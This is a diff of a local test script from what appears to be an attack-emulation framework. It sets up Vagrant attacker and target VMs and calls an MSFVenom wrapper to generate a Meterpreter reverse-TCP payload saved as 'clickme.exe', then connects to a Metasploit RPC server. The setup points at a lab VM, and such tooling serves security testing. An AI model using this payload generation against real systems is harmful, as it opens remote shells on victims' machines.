@ -4,8 +4,7 @@ from app.metasploit import MSFVenom, Metasploit
# For some local tests
if __name__ == " __main__ " :
if __name__ == " __main__ " :
# msfrpcd -S -P password -u user -f
attacker_ip = " 192.168.178.125 "
@ -17,16 +16,6 @@ if __name__=="__main__":
attack_logger = AttackLog ( 0 )
attacker = Machine ( { " root " : " systems/attacker1 " ,
" os " : " linux " ,
" vm_controller " : {
" type " : " vagrant " ,
" vagrantfilepath " : " systems " ,
" ip " : attacker_ip
} ,
" vm_name " : " attacker1 " } , attack_logger )
# Target machine is attacker machine here
target = Machine ( { " root " : " systems/attacker1 " ,
" os " : " linux " ,
" vm_controller " : {
" type " : " vagrant " ,
@ -35,6 +24,16 @@ if __name__=="__main__":
} ,
" vm_name " : " attacker1 " } , attack_logger )
# Target machine is attacker machine here
target = Machine ( { " root " : " systems/attacker1 " ,
" os " : " linux " ,
" vm_controller " : {
" type " : " vagrant " ,
" vagrantfilepath " : " systems " ,
" ip " : attacker_ip
} ,
" vm_name " : " attacker1 " } , attack_logger )
venom = MSFVenom ( attacker , target )
print ( venom . generate_cmd ( payload = " linux/x64/meterpreter_reverse_tcp " ,
architecture = " x64 " ,
@ -44,4 +43,4 @@ if __name__=="__main__":
outfile = " clickme.exe " ) )
metasploit = Metasploit ( password , server = attacker . get_ip ( ) , username = user )
# client = MsfRpcClient('yourpassword', ssl=True)
# client = MsfRpcClient('yourpassword', ssl=True)